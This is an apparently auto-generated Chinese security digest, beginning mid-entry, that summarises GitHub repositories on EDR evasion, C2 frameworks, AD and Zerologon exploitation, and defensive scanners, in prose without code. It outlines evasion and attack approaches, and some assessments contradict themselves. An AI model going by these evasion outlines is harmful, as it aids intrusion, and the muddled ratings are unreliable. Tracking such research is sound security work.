|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
PhantomX是一个高级的EDR规避框架,使用Golang编写。本次更新新增了shellcode XOR加密功能,可以对shellcode进行简单的异或加密,以尝试绕过EDR的检测。同时,增加了编译自动化脚本,方便构建不同平台的payload。这些功能有助于提高规避EDR检测的成功率。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | PhantomX是一个用Golang编写的EDR规避框架 |
|
|||
|
|
| 2 | 新增了shellcode XOR加密模块 |
|
|||
|
|
| 3 | 实现了编译自动化,方便生成不同平台的payload |
|
|||
|
|
| 4 | XOR加密 shellcode有助于规避EDR检测 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增shellcode XOR加密模块,使用固定密钥对shellcode进行异或加密和解密
|
|||
|
|
|
|||
|
|
> 编译自动化脚本允许在不同的操作系统和架构上编译PhantomX,并设置编译选项进行二进制文件优化,例如剥离符号信息等
|
|||
|
|
|
|||
|
|
> XOR加密是一种简单的混淆技术,可以防止基于字符串匹配的检测,增加EDR分析难度
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• EDR evasion framework
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增的XOR加密功能增强了EDR规避能力,结合编译自动化,使得构造多平台免杀payload更加便捷,属于对安全防御具有一定对抗性的功能
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### DNSObelisk - DNS数据泄露防御系统
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [DNSObelisk](https://github.com/Synarcs/DNSObelisk) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
DNSObelisk是一个旨在全面防御DNS数据泄露(包括C2和隧道)的解决方案。它利用XDP、TC、Netfilter、BPF_MAPs、环形缓冲区等技术,在Linux内核中运行eBPF,并在用户空间中使用深度学习。本次更新着重增强了对TCP的DNS数据泄露的防护,包括在eBPF map中使用连接跟踪状态映射,以及通过内核TC阻止DNS数据传输。同时修改了DGA模块,可能提升了C2域名的隐蔽性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | DNSObelisk是一个增强的可观察性和安全解决方案,旨在通过XDP、TC、Netfilter和eBPF技术全面阻止DNS数据泄露(C2、隧道)。 |
|
|||
|
|
| 2 | 更新增强了针对TCP的DNS数据泄露的安全性,并支持eBPF map中的连接跟踪状态映射,用于TCP握手前的DNS传输,并在内核TC中阻止通过TCP套接字进行DNS数据传输。 |
|
|||
|
|
| 3 | 更新修改了DGA模块,用于生成C2域名,可能使用了base64编码。 |
|
|||
|
|
| 4 | 修复了用户空间功能调试内核重定向 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 更新在eBPF中增加了对TCP握手的支持,并在TCP连接建立之前就阻止DNS数据传输。
|
|||
|
|
|
|||
|
|
> DGA模块修改,域名生成方式可能采用了base64编码,提高了C2域名隐藏性。
|
|||
|
|
|
|||
|
|
> 用户空间功能调试内核重定向已修复
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• DNSObelisk, eBPF kernel modules, DGA module, user space feature debug kernel redirect
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新增强了对TCP DNS数据泄露的防护,并修改了C2域名生成方式,提升了安全防护能力。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-49019 - AD 权限提升漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-49019 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 04:09:23 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-49019-rayng](https://github.com/rayngnpc/CVE-2024-49019-rayng)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了关于 CVE-2024-49019 漏洞的详细信息,该漏洞允许在 Active Directory 环境中进行权限提升。README 文件详细介绍了使用 Certipy 工具的攻击方法,包括请求证书和利用证书来获取管理员访问权限。Detectionguide.md 文件提供了检测 LDAP 查询和权限提升尝试的指南。最近的提交更新了 README 和 Detectionguide 文件,增加了利用步骤和检测方法。虽然仓库star数为0,但是提供了详细的利用步骤和检测方法,漏洞价值高。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | CVE-2024-49019 涉及 Active Directory 权限提升 |
|
|||
|
|
| 2 | README 文件中包含利用 Certipy 工具进行攻击的详细步骤 |
|
|||
|
|
| 3 | 提供了多种利用场景,包括请求证书和使用证书获取管理员访问权限 |
|
|||
|
|
| 4 | Detectionguide.md 提供了检测 LDAP 查询和权限提升尝试的指南 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞利用主要基于 Certipy 工具,通过请求和使用证书来实现权限提升。
|
|||
|
|
|
|||
|
|
> 利用方法包括使用测试用户证书请求域管理员证书,然后使用获得的证书进行身份验证以获取管理员权限。
|
|||
|
|
|
|||
|
|
> 提供了检测未经授权的 LDAP 查询和权限提升尝试的指南,包括配置 Wazuh 进行监控和警报。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Active Directory
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的 Active Directory 系统,且提供了明确的利用方法,包括完整的 Certipy 攻击步骤,以及检测策略,价值极高。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2020-1472 - Zerologon漏洞模拟与防护
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2020-1472 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 03:20:59 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [Simulating-and-preventing-Zerologon-CVE-2020-1472-vulnerability-attacks.](https://github.com/PakwanSK/Simulating-and-preventing-Zerologon-CVE-2020-1472-vulnerability-attacks.)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库旨在模拟Zerologon (CVE-2020-1472) 漏洞在Windows Server 2016上的攻击,并展示使用Trend Micro Deep Security解决方案进行防护的方法。更新的README.md文件详细介绍了Zerologon漏洞的原理,即Netlogon协议中的一个弱点,攻击者无需密码即可控制域控制器。仓库提供了攻击所需的工具列表,包括VMware Workstation、Windows Server 2016、Active Directory、Kali Linux、Docker、Zerologon漏洞利用代码(链接到VoidSec的GitHub仓库)、Python以及Trend Micro Deep Security。此外,还提供了攻击结果的报告和演示文稿链接。由于该漏洞影响广泛,且有明确的利用方法,因此漏洞具有极高的价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 模拟Zerologon漏洞攻击 |
|
|||
|
|
| 2 | 利用Netlogon协议中的缺陷 |
|
|||
|
|
| 3 | 可导致攻击者完全控制域控制器 |
|
|||
|
|
| 4 | 提供了漏洞利用代码链接 |
|
|||
|
|
| 5 | 包含Trend Micro Deep Security的防护方案 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Zerologon漏洞利用Netlogon协议中的一个缺陷,允许未经身份验证的攻击者更改域控制器的计算机帐户密码,从而完全控制域控制器。
|
|||
|
|
|
|||
|
|
> 该仓库模拟了Zerologon攻击,并提供了利用代码的链接。
|
|||
|
|
|
|||
|
|
> 该仓库还介绍了使用Trend Micro Deep Security来防止Zerologon攻击的方法。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Windows Server 2016
|
|||
|
|
• Active Directory
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响Windows Server的Active Directory,属于高危漏洞,利用方式明确,影响范围广泛。该项目提供了模拟攻击和防护方案,具有实际价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### abb - 蒸汽平台内存漏洞利用
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [abb](https://github.com/Liuwuwu03/abb) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `POC收集` |
|
|||
|
|
| 更新类型 | `初始提交` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个关于蒸汽平台内存漏洞利用的项目,仅提供学习版本,包含POC。 仓库的核心功能是利用蒸汽平台的内存漏洞。 更新内容是初始提交,包含了README文件,描述了仓库的用途。仓库与'漏洞'关键词高度相关,因为它直接涉及到漏洞的利用。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 蒸汽平台内存漏洞利用 |
|
|||
|
|
| 2 | 仅供学习版本,提供POC |
|
|||
|
|
| 3 | 与漏洞关键词高度相关 |
|
|||
|
|
| 4 | 涉及内存漏洞利用的技术细节 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 提供了蒸汽平台内存漏洞的利用方法,具体细节需要进一步分析代码。
|
|||
|
|
|
|||
|
|
> 由于是POC,安全机制分析有限
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 蒸汽平台
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接针对'漏洞'关键词,提供了针对蒸汽平台的内存漏洞的利用方法,具有一定的研究价值。虽然是学习版,但提供了POC,展示了漏洞利用的技术细节。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Milkyway - Milkyway 引入 DSL 引擎,增强扫描能力
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Milkyway](https://github.com/polite-007/Milkyway) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用/安全研究` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **4**
|
|||
|
|
- 变更文件数: **88**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
Milkyway 是一款全方位扫描工具。此次更新引入了 DSL (Domain Specific Language) 表达式引擎,极大地增强了其数据处理和分析能力。 具体而言,新增了 pkg/neutron/commons/dsl 包及其子包,实现了自定义 DSL 函数的定义、DSL 引擎的构建以及 DSL 表达式的求值。该 DSL 引擎包含了各种字符串处理、编码解码、哈希计算、日期时间处理等函数,并特别增加了针对反序列化漏洞的 payload 生成器。 这些更新意味着,Milkyway 能够更灵活地处理扫描过程中遇到的各种数据,并且能够通过 DSL 表达式进行复杂的逻辑判断和数据提取。 DSL 的引入使得该工具具备了进行安全研究和漏洞利用的能力。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Milkyway 引入 DSL 表达式引擎,增强了数据处理能力 |
|
|||
|
|
| 2 | 新增 DSL 函数,如用于反序列化漏洞利用的函数 |
|
|||
|
|
| 3 | 提供 Java 反序列化 Gadget 生成器 |
|
|||
|
|
| 4 | 更新内容与漏洞利用、安全研究相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 引入 DSL 表达式引擎: 创建了 `pkg/neutron/commons/dsl` 包,包含 DSL 表达式的编译、求值等核心功能。 该包引入了 `github.com/Knetic/govaluate` 库,用于表达式解析和计算。
|
|||
|
|
|
|||
|
|
> DSL 函数定义: 在 `pkg/neutron/commons/dsl/dsl.go` 中定义了多种 DSL 函数,包括字符串处理(`substring`, `replace` 等)、编码解码(`url_encode`, `base64_decode` 等)、哈希算法(`md5`, `sha256` 等)、时间处理等。这些函数可以被用于构造复杂的表达式以满足不同的数据处理需求。
|
|||
|
|
|
|||
|
|
> 反序列化 Gadget 生成: `pkg/neutron/commons/dsl/deserialization/deserialization.go` 实现了 Java 反序列化 Gadget 的生成。支持生成 `dns`, `jdk7u21`, `jdk8u20`, `commons-collections3.1`, `commons-collections4.0`, `groovy1` 等多种类型的 Gadget,并支持 base64 编码。
|
|||
|
|
|
|||
|
|
> DSL 引擎集成: `pkg/neutron/commons/dsl/engine.go` 提供了 `Engine` 结构体,用于存储 DSL 表达式并支持从缓存中加载。`pkg/neutron/commons/replacer.go` 提供了 `Replace` 函数,用于替换模板中的占位符。
|
|||
|
|
|
|||
|
|
> HTTP 请求处理: `pkg/neutron/protocols/http/request.go` 使用了 DSL 表达式处理,允许在 HTTP 请求的各个部分(例如 URL、Header、Body)中使用 DSL 函数进行动态构造。
|
|||
|
|
|
|||
|
|
> 测试用例: `pkg/neutron/commons/dsl/dsl_test.go` 提供了 DSL 函数的单元测试,验证了其正确性。 `pkg/neutron/protocols/http/request_generator.go` 展示了如何在 HTTP 请求中使用 DSL 表达式生成 payload
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Milkyway 扫描器
|
|||
|
|
• DSL 表达式引擎
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新引入了 DSL 引擎,使 Milkyway 具备了处理复杂数据的能力,尤其是在漏洞利用和安全研究方面。反序列化 Gadget 生成器的引入表明该工具能够直接用于生成和利用反序列化漏洞。 这种能力使得 Milkyway 不仅仅是一个扫描器,更是一个潜在的漏洞利用框架。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### AI-Infra-Guard - AI基础设施安全评估工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `漏洞利用/安全修复/安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **4**
|
|||
|
|
- 变更文件数: **6**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个AI基础设施安全评估工具,本次更新主要包括:1. 新增CVE-2025-1979漏洞的指纹信息,用于检测 Ray 组件中的密码泄露漏洞; 2. 修复了Web服务器的文件访问安全问题,防止路径遍历攻击; 3. 改进了版本号处理逻辑;4. 更新依赖及banner显示。CVE-2025-1979 漏洞允许攻击者在特定配置下泄露 Redis 密码。Web 服务器的修复防止了通过构造恶意 URL 访问服务器上任意文件的问题。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增了CVE-2025-1979漏洞的指纹信息,该漏洞涉及 Ray 组件中 Redis 密码泄露。 |
|
|||
|
|
| 2 | 修复了Web服务器的文件访问安全问题,防止路径遍历攻击。 |
|
|||
|
|
| 3 | 修改了版本号处理逻辑,增强了版本匹配的准确性。 |
|
|||
|
|
| 4 | 更新了项目依赖,并修改了banner显示 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> CVE-2025-1979: 添加了针对 Ray 版本小于 2.43.0 的 Redis 密码泄露漏洞的指纹信息。该漏洞利用了 Ray 在日志中记录 Redis 密码的缺陷。攻击者需要满足:启用了日志记录,Redis 使用密码认证,并且攻击者可以访问这些日志。该更新添加了YAML文件,描述了漏洞信息,包括CVE编号,漏洞描述,CVSS评分,影响组件,安全建议等。
|
|||
|
|
|
|||
|
|
> Web服务器修复: 更新了Web服务器,增加了对用户请求路径的检查,防止路径遍历攻击。修改了服务器对静态资源的请求处理方式,避免了直接通过修改URL来访问服务器上任意文件的问题。
|
|||
|
|
|
|||
|
|
> 版本号处理: 更新了common/fingerprints/parser/synax.go,处理了最新的版本号(latest),添加了version为空时的处理逻辑。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Ray
|
|||
|
|
• Web Server
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增了针对 CVE-2025-1979 漏洞的检测指纹,修复了 Web 服务器的文件访问漏洞,修复了潜在的安全风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### precommit-llm - AI驱动的代码安全检查工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [precommit-llm](https://github.com/dang-nh/precommit-llm) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个pre-commit hook,使用Google Gemini LLM在代码提交前进行代码质量分析、漏洞检测和安全风险识别。本次更新添加了配置文件`.llm-precommit.yml`,允许用户配置LLM API密钥、文件类型、排除模式等,并更新了README文件,其中修改了Gemini API key的链接地址和安装方法。这使得用户可以更容易地集成该工具到其开发流程中,从而在代码提交前发现潜在的安全漏洞和代码质量问题。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于LLM的pre-commit hook,用于代码质量检查、漏洞检测。 |
|
|||
|
|
| 2 | 更新添加配置文件 .llm-precommit.yml,用于配置LLM API密钥、文件类型、排除模式等。 |
|
|||
|
|
| 3 | README更新了Gemini API key的链接地址和安装方法。 |
|
|||
|
|
| 4 | 允许用户在代码提交前使用LLM检测代码中的安全漏洞。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> `.llm-precommit.yml`文件允许用户配置以下选项:`api_key_env_var` (指定Gemini API密钥的环境变量), `include_extensions` (指定需要检查的文件扩展名), `exclude_patterns` (指定需要排除的模式), `max_file_size_kb` (最大文件大小), `verbose` (详细模式), `check_all_files` (检查所有文件), `custom_prompt_template` (自定义提示模板), `fail_on_issues` (出现问题时失败)。
|
|||
|
|
|
|||
|
|
> 该工具的核心在于利用LLM(Gemini)进行代码分析,识别潜在的安全漏洞和代码质量问题。虽然没有直接提供漏洞利用代码,但通过增强代码检查功能,有助于在早期阶段发现安全隐患。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 代码质量检查工具
|
|||
|
|
• Gemini LLM
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新增加了配置功能,使得安全检查工具更加易于使用和定制,能够帮助用户在代码提交前发现安全漏洞,属于安全功能增强,具有一定的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### AutoVulnerabilityFinder - 自动漏洞数据获取工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [AutoVulnerabilityFinder](https://github.com/ILoveScratch2/AutoVulnerabilityFinder) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个自动从NVD等渠道获取漏洞数据的工具。本次更新主要增加了配置文件支持,允许用户配置数据源、告警方式等;新增了漏洞报告输出文件,以更友好的方式展示漏洞信息;同时更新了依赖库。从安全角度看,该仓库改进了漏洞数据的获取和展示,提高了漏洞发现和响应的效率。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增配置文件支持,允许用户自定义配置 |
|
|||
|
|
| 2 | 添加漏洞报告输出文件,方便查看 |
|
|||
|
|
| 3 | 改进了漏洞数据获取和告警机制 |
|
|||
|
|
| 4 | 增加了对漏洞严重性的分析和展示 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增`config.toml`配置文件,通过`tomli`库解析,允许自定义配置,包括数据源、邮件服务器等。
|
|||
|
|
|
|||
|
|
> 新增`vulnerability_report.txt`文件,用于生成漏洞监控报告,报告包含漏洞列表、严重性分布等信息。
|
|||
|
|
|
|||
|
|
> 更新`requirements.txt`,增加了`tomli`依赖。
|
|||
|
|
|
|||
|
|
> 修改`get_vulnerability.py`,加入了加载配置文件和发送邮件的逻辑
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• NVD漏洞数据源
|
|||
|
|
• 配置文件
|
|||
|
|
• 邮件告警系统
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增配置文件功能,使得用户可以自定义漏洞数据源和告警方式,提高了工具的实用性和灵活性。漏洞报告的生成和展示功能方便用户快速了解漏洞信息,有利于安全风险的评估和应对。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### HexaneC2-pre-alpha - HexaneC2 C2框架更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [HexaneC2-pre-alpha](https://github.com/1emvr/HexaneC2-pre-alpha) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
HexaneC2是一个C2框架,本次更新添加了BeginExecution功能,并新增了FlushInstructionCache API调用。此类更新增强了C2框架的功能,可能被用于绕过安全检测或实现隐蔽的恶意代码执行。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | HexaneC2是一个具有可塑性配置和最小化UI功能的C2框架 |
|
|||
|
|
| 2 | 更新添加了BeginExecution功能 |
|
|||
|
|
| 3 | 新增FlushInstructionCache API调用 |
|
|||
|
|
| 4 | 增加了C2框架的功能,可能用于绕过安全检测或实现隐蔽的恶意代码执行 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 添加了BeginExecution功能,可能与代码执行流程相关
|
|||
|
|
|
|||
|
|
> 新增FlushInstructionCache API调用,用于刷新指令缓存,可能用于规避安全检测或优化代码执行
|
|||
|
|
|
|||
|
|
> 更新配置文件,strings.txt新增了FlushInstructionCache,增加了C2框架的功能
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• C2 Framework
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新增加了C2框架功能,增加了代码执行的灵活性和隐蔽性,可能被用于绕过安全检测和实现隐蔽的恶意代码执行。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### c2a - 未明确功能的C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [c2a](https://github.com/huioww/c2a) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2框架,但没有提供明确的功能描述。最近的提交显示作者在持续进行代码更新。由于没有明确的细节,无法判断其具体安全相关内容。但是,C2框架本身就与网络安全密切相关,因此本次更新有待进一步分析。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架 |
|
|||
|
|
| 2 | 持续更新 |
|
|||
|
|
| 3 | C2框架代码更新 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> C2框架的实现细节未知
|
|||
|
